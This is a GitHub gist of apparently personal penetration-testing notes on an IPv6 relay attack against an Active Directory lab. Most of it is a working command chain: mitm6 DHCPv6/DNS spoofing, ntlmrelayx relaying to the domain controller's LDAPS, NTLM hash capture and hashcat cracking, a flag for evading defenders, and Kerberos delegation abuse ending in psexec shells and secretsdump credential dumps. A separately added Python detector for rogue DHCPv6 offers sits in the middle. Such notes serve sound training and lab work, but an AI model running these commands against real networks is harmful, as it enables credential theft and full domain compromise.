@HussienMisbah
Last active July 14, 2022 16:29
step-1 :

  • start mitm6 so it listens for IPv6 requests on the network and answers them with spoofed replies
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local
  • for example, if we restart any machine we will see the spoofing take effect; on the machine side:

image

  • and this is the attacker's IPv6 address

step-2 :

  • start ntlmrelayx so that, after spoofing, the captured authentication is relayed to the target:
sudo ntlmrelayx.py -6 -t ldaps://192.168.17.138 -wh evil.marvel.local  -l loots
-6  : listen on IPv6
-t  : target to relay to, e.g. the DC
-wh : WPAD host, the fake WPAD server to advertise
-l  : directory to save loot in
  • in this example we are targeting the domain controller

step-3 :

  • wait until a machine reboots or any IPv6 activity happens on the network

image

  • and on the ntlmrelayx side:

image

  • and it dumped a lot of things here: users, groups, etc.

image

  • remember we put the SQL service in the description; we can see it now

image

  • now if an administrator logs in to the machine we just spoofed, mitm6 will authenticate with LDAP to the DC and create a new user for us with a special ACL

image
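A defender-side check for the spoofing in step 1, added here as an example that is not part of the gist: a minimal DHCPv6 parser (RFC 8415 framing) that flags ADVERTISE/REPLY messages whose DNS-server option names an address outside an allowlist. On an IPv4-only AD network the allowlist is empty, so any DHCPv6 offer is suspicious. The sample messages are constructed, not captures.

```python
import ipaddress
import struct

# DHCPv6 message types and option codes from RFC 8415 (only the ones needed here).
MSG_TYPES = {1: "SOLICIT", 2: "ADVERTISE", 3: "REQUEST", 7: "REPLY"}
OPTION_SERVERID = 2
OPTION_DNS_SERVERS = 23

def parse_dhcpv6(payload: bytes) -> dict:
    """Split the UDP payload of a DHCPv6 message into type, transaction id and (code, data) options."""
    if len(payload) < 4:
        raise ValueError("DHCPv6 message too short")
    options, offset = [], 4
    while offset + 4 <= len(payload):
        code, length = struct.unpack_from("!HH", payload, offset)
        data = payload[offset + 4:offset + 4 + length]
        if len(data) != length:
            raise ValueError("truncated DHCPv6 option")
        options.append((code, data))
        offset += 4 + length
    return {"type": MSG_TYPES.get(payload[0], str(payload[0])),
            "xid": int.from_bytes(payload[1:4], "big"), "options": options}

def dns_servers(msg: dict) -> list:
    """Return every IPv6 address carried in OPTION_DNS_SERVERS (a list of 16-byte addresses)."""
    addrs = []
    for code, data in msg["options"]:
        if code == OPTION_DNS_SERVERS:
            addrs += [str(ipaddress.IPv6Address(data[i:i + 16])) for i in range(0, len(data) // 16 * 16, 16)]
    return addrs

def rogue_dns_offers(msg: dict, allowed: set) -> list:
    """Server-side messages (ADVERTISE/REPLY) whose DNS option names a server not on the allowlist.
    With an empty allowlist (IPv4-only network) every DHCPv6 offer is reported."""
    if msg["type"] not in ("ADVERTISE", "REPLY"):
        return []
    ok = {ipaddress.IPv6Address(a) for a in allowed}
    return [a for a in dns_servers(msg) if ipaddress.IPv6Address(a) not in ok]

# Constructed sample messages (not real captures): an ADVERTISE whose DNS option points at a
# link-local host, as a rogue DHCPv6 server would send, and a REPLY from a legitimate server.
_DUID_LL = b"\x00\x03\x00\x01\xaa\xbb\xcc\xdd\xee\xff"
ROGUE_ADVERTISE = (b"\x02\x0a\x0b\x0c"
                   + struct.pack("!HH", OPTION_SERVERID, len(_DUID_LL)) + _DUID_LL
                   + struct.pack("!HH", OPTION_DNS_SERVERS, 16) + ipaddress.IPv6Address("fe80::1234").packed)
LEGIT_REPLY = (b"\x07\x0a\x0b\x0d"
               + struct.pack("!HH", OPTION_DNS_SERVERS, 16) + ipaddress.IPv6Address("2001:db8::53").packed)

if __name__ == "__main__":
    for name, raw in (("rogue", ROGUE_ADVERTISE), ("legit", LEGIT_REPLY)):
        msg = parse_dhcpv6(raw)
        print(name, msg["type"], hex(msg["xid"]), rogue_dns_offers(msg, {"2001:db8::53"}))
```

Feed it the UDP payload of traffic to port 546/547 from a capture; on a network that should have no DHCPv6 at all, any non-empty result is an alert.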

Capture hashes

you can also capture hashes once you have spoofed the DNS server: when any user tries to access a share, the request comes back to you, letting you capture the user's hash (the same idea as Responder, but using IPv6 instead of LLMNR)

# Set your spoofer 
sudo python3 mitm6.py -d marvel.local
# Set your smbserver
smbserver.py -smb2support SMB .

image

Then you can try to crack it with :

hashcat -m 5600 hash  /usr/share/wordlists/rockyou.txt 

More :

  • use the --no-ra option (do not advertise ourselves with router advertisements) to avoid blue team monitoring
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local --no-ra 
  • Kerberos delegation attack
sudo ntlmrelayx.py -ts -6 -t ldaps://<dc-ip> -wh evil.marvel.local  --add-computer --delegate-access
# the LDAP server is usually the domain controller itself
-ts : add a timestamp to every log line
--add-computer : attempt to add a new computer account
--delegate-access : delegate access on the relayed computer account to the specified account

Once a computer restarts and we have spoofed DHCPv6 successfully, a new computer account with a random name is added and allowed to impersonate users, as the options we specified request

getST.py -spn cifs/<spoofed-computer>.lab.local lab.local/<new-computer>\$ -impersonate <domain-username>
# ex : getST.py -spn cifs/ws02.lab.local lab.local/ULRRDUA\$ -impersonate lkys
export KRB5CCNAME=lkys.ccache

we can now access the file system or get an interactive shell using this ticket:

psexec.py -k ws02.lab.local -debug -no-pass
secretsdump.py -k ws02.lab.local -no-pass
wmiexec.py -k -no-pass -debug ws02.lab.local
smbclient -k //ws02.lab.local/c$

Resources :

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

https://chryzsh.github.io/relaying-delegation/

https://youtu.be/Zb-Fp62N2y8
